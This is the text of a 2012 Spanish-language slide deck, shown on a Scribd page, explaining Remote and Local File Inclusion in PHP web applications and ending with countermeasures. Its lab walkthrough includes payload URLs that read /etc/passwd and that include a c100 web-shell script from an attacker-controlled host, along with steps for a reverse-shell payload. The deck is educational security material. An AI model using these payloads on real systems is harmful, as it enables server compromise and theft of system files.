Scribd Logo
Upload

Welcome to Scribd!

  • Remote File Inclusionv1.0

    Uploaded by

    abraxasboot
    29 views13 pages

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    29 views13 pages

    Remote File Inclusionv1.0

    Uploaded by

    abraxasboot

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 13

    Remote File Inclusion (RFI)

    File Inclusion (RFI): Incluyendo archivos en el sistema operativo


    Diciembre, 2012

    Omar Palomino
    omarc320@gmail.com Twitter: @ELPalomo_Blog

    http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

    Ing. Sistemas y Maestrista de Ing. de Computacin y Sistemas, CEH, Security+, ITIL v3. Consultor en seguridad de informacin. Psiclogo que aun no comienza sus estudios. Escritor en mis tiempos libres: http://www.el-palomo.com
    http://www.facebook.com/El.Palomo.Seguridad.Informacion

    http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

    Introduccin al RFI vs LFI

    Cmo realizar el ataque?

    Tomando el control del S.O

    Conclusiones y contramedidas

    AVISO Y CONSIDERACIONES LEGALES

    Las tcnicas mostradas en la presentacin tienen por objetivo CONOCER las tcnicas utilizadas por los hackers para robar y secuestrar sesiones de aplicaciones web. La presentacin NO TIENE POR OBJETIVO ensear tcnicas para realizar ataques contra aplicaciones web que son penados segn la legislacin de cada pas. El autor no se hace responsable del mal uso de las tcnicas mostradas en la presentacin.

    http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

    Introduccin al RFI vs LFI

    Cmo realizar el ataque?

    Tomando el control del S.O

    Conclusiones y contramedidas

    Descripcin

    RFI: Remote File Inclusion permite aadir scripts o archivos remotos en el servidor vulnerable. LFI: Local File Inclusion permite obtener archivos locales almacenados en el servidor. RFI nos permitir subir archivos al servidor vulnerable (*) RFI nos permitir realizar una conexin reversa a travs de un PAYLOAD

    http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

    Introduccin al RFI vs LFI

    Cmo realizar el ataque?

    Tomando el control del S.O

    Conclusiones y contramedidas

    Descripcin
    http://192.168.1.44/fileinclusion/main.php?page=/etc/passwd

    LOCAL FILE INCLUSION (LFI)

    http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

    Introduccin al RFI vs LFI

    Cmo realizar el ataque?

    Tomando el control del S.O

    Conclusiones y contramedidas

    Funcionamiento (RFI)

    http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

    Introduccin al RFI vs LFI

    Cmo realizar el ataque?

    Tomando el control del S.O

    Conclusiones y contramedidas

    Funcionamiento

    1.- El servidor WEB controlado por el HACKER contiene un script que nos permite realizar un UPLOAD de archivos. 2.- Aqu podemos realizar la carga de muchos archivos remotos.

    http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

    Introduccin al RFI vs LFI

    Cmo realizar el ataque?

    Tomando el control del S.O

    Conclusiones y contramedidas

    http://192.168.1.44/fileinclusion/main.php?page=http://192.168.1.48/hacking/c100.txt

    Introduccin al RFI vs LFI

    Cmo realizar el ataque?

    Tomando el control del S.O

    Conclusiones y contramedidas

    Funcionamiento
    1.- Creamos un PAYLOAD de conexin reversa para cargarla al servidor vulnerable.

    2.- Colocamos la direccin IP del Bactrack en la variable LHOST


    3.- Ejecutamos el script y esperamos la conexin reversa..

    http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

    Introduccin al RFI vs LFI

    Cmo realizar el ataque?

    Tomando el control del S.O

    Conclusiones y contramedidas

    Por qu ocurre el RFI?


    Existen 02 motivos por los cuales est presente esta vulnerabilidad: Errores asociados al Administrador de Sistemas: Se debe deshabilitar las opciones ALLOW_URL_INCLUDE y ALLOW_URL_FOPEN en php.ini

    http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

    Introduccin al RFI vs LFI

    Cmo realizar el ataque?

    Tomando el control del S.O

    Conclusiones y contramedidas

    Por qu ocurre el RFI?


    Errores asociados a malas prcticas de programacin:

    Inclusin de archivos pasados por el mtodo GET como pgina web, el mismo representa una vulnerabilidad.

    http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

    Introduccin al RFI vs LFI

    Cmo realizar el ataque?

    Tomando el control del S.O

    Conclusiones y contramedidas

    Cmo evitamos RFI y sus opciones avanzadas?


    ADECUADA METODOLOGA DE PROGRAMACIN SEGURA, LA MISMA QUE DEBE ESTAR ALINEADA A OWASP
    RESTRINGIR CARPETAS CON PERMISOS DE ESCRITURA, PARA QUE NO PERMITA EL UPLOAD DE ARCHIVOS MALICIOSOS CONFIGURAR ADECUDADAMENTE LAS VARIABLES DEL SERVIDOR (ARCHIVO PHP.INI) POR PARTE DEL SYSTEM ADMIN.

    http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

    Remote File Inclusion (RFI)

    File Inclusion (RFI): Incluyendo archivos en el sistema operativo


    Diciembre, 2012

    Omar Palomino
    omarc320@gmail.com Twitter: @ELPalomo_Blog

    http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion

    You might also like